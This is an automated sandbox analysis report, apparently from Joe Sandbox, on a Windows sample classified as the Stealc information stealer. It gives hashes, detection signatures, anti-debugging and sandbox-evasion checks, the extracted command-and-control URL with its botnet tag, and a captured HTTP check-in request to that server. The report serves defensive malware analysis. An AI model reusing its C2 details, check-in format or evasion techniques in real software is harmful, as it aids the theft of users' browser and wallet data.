Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544998
MD5: b2d5f7c5a51b55bfe094dbe2a60da2e3
SHA1: ace802a1a1b603e5361c2f3a2b4b5361b3358186
SHA256: a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
Tags: exeuser-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.f10000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00F29030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1A2B0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00F1A2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00F172A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00F1A210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00F1C920
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F11710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F1DF10

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
  Data Ascii:
    ------KJKJJEGIDBGIDGCBAFHC
    Content-Disposition: form-data; name="hwid"
    
    A12B30462FB12518020777
    ------KJKJJEGIDBGIDGCBAFHC
    Content-Disposition: form-data; name="build"
    
    tale
    ------KJKJJEGIDBGIDGCBAFHC--
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00F162D0
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/b
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/w
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/wKL
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00F14610 appears 316 times
Source: file.exe Static PE information: Section: yhvanrkb ZLIB complexity 0.994987962613293
Source: file.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00F29790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00F23970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7W9T3KML.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe Static file information: File size 2133504 > 1048576
Source: file.exe Static PE information: Raw size of yhvanrkb is bigger than: 0x100000 < 0x19dc00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F29BB0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x2149bd should be: 0x20bfe1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: yhvanrkb
Source: file.exe Static PE information: section name: owhwljin
Source: file.exe Static PE information: section name: .taggant
Source: file.exe Static PE information: section name: yhvanrkb entropy: 7.953026815598935

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E0DF second address: 137E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E0F1 second address: 137E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F04CBD318h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3898h] 0x00000029 xor dx, E5B2h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c push A02F51E2h 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0F04CBD31Ah 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E15D second address: 137E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a add dword ptr [esp], 5FD0AE9Eh 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2AC3h], edx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2E07h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F0F0527E408h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov si, 2B17h 0x00000041 mov di, si 0x00000044 push A07DFA96h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E1B7 second address: 137E1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E29A second address: 137E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E2AE second address: 137E322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov ebx, dword ptr [ebp+122D3780h] 0x00000012 and edi, dword ptr [ebp+122D21E9h] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov edx, dword ptr [ebp+122D38A4h] 0x00000022 pop edi 0x00000023 push 7B65ECA4h 0x00000028 push esi 0x00000029 jnc 00007F0F04CBD318h 0x0000002f pop esi 0x00000030 xor dword ptr [esp], 7B65EC24h 0x00000037 jmp 00007F0F04CBD325h 0x0000003c xor edi, dword ptr [ebp+122D3A58h] 0x00000042 push 00000003h 0x00000044 mov edx, dword ptr [ebp+122D384Ch] 0x0000004a push 00000000h 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D379Ch] 0x00000054 call 00007F0F04CBD319h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E322 second address: 137E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137E329 second address: 137E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F04CBD31Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0F04CBD31Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0F04CBD322h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F0F04CBD329h 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 mov dword ptr [ebp+122D2B3Ah], edx 0x00000037 lea ebx, dword ptr [ebp+12453E2Eh] 0x0000003d xor dword ptr [ebp+122D2A5Ch], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F0F04CBD31Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1390661 second address: 1390665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139F198 second address: 139F1F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F04CBD328h 0x0000000e jnp 00007F0F04CBD318h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push edi 0x00000017 jo 00007F0F04CBD316h 0x0000001d pop edi 0x0000001e popad 0x0000001f push ecx 0x00000020 jmp 00007F0F04CBD324h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D7FE second address: 139D804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D804 second address: 139D808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DBCF second address: 139DBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DD94 second address: 139DDA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DDA8 second address: 139DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DDAE second address: 139DDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E065 second address: 139E089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E418h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E089 second address: 139E08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1396515 second address: 1396519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13714B4 second address: 13714BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E33F second address: 139E353 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F0527E40Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E353 second address: 139E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E914 second address: 139E91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E91A second address: 139E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E921 second address: 139E93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F0527E411h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139E93E second address: 139E948 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139EC11 second address: 139EC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139EC19 second address: 139EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139EC1F second address: 139EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139ED6D second address: 139ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0F04CBD325h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F0F04CBD316h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F04CBD31Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A25E9 second address: 13A25ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1368DB0 second address: 1368DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1374D0B second address: 1374D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AB8E8 second address: 13AB902 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F04CBD324h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AB902 second address: 13AB906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ABBF8 second address: 13ABC2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 je 00007F0F04CBD316h 0x00000016 jmp 00007F0F04CBD31Ah 0x0000001b jl 00007F0F04CBD316h 0x00000021 popad 0x00000022 jmp 00007F0F04CBD31Bh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ABEE6 second address: 13ABEEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
